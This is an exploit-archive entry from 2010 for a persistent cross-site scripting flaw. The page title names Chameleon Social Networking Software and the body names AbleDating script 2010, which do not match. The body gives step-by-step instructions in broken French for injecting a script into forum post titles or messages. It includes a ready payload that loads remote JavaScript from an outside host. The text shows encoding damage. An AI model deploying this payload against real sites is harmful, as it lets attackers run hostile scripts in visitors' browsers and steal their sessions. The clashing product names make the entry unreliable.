[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Chameleon Social Networking Software Persistent XSS Vulnerability
# Published : 2010-11-15
# Author : Dr-mosta
# Previous Title : Joomla Component (com_alfurqan15x) SQL Injection Vulnerability
# Next Title : Nuked-Klan Module Boutique Blind SQL Injection
# Exploit Title: AbleDating script 2010 Critical XSS Vulnerability
# Date: 15.11.2010
# Author: Dr-mosta
# Category: webapps/0day
# Script url: http://www.abk-soft.com/matchmaking_software_demo.html
# Version: N/A
# Tested on:
# CVE :
[ EXPL0!T ]
IL vaut faut inscrire au site apres aller a la partie forum ou par le
lien : www.sitevictim.com/forum.php
aper essais de choisir un category et essais de cree un Sujet dans le forum
vous pouvez ajout¨¦ votre code xss das le titre de Poster ou Description ou Message
Exemple exploit code :
¡°><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><¡±
Greetz = TeaM MostA , exploit-db.com
Good Luck .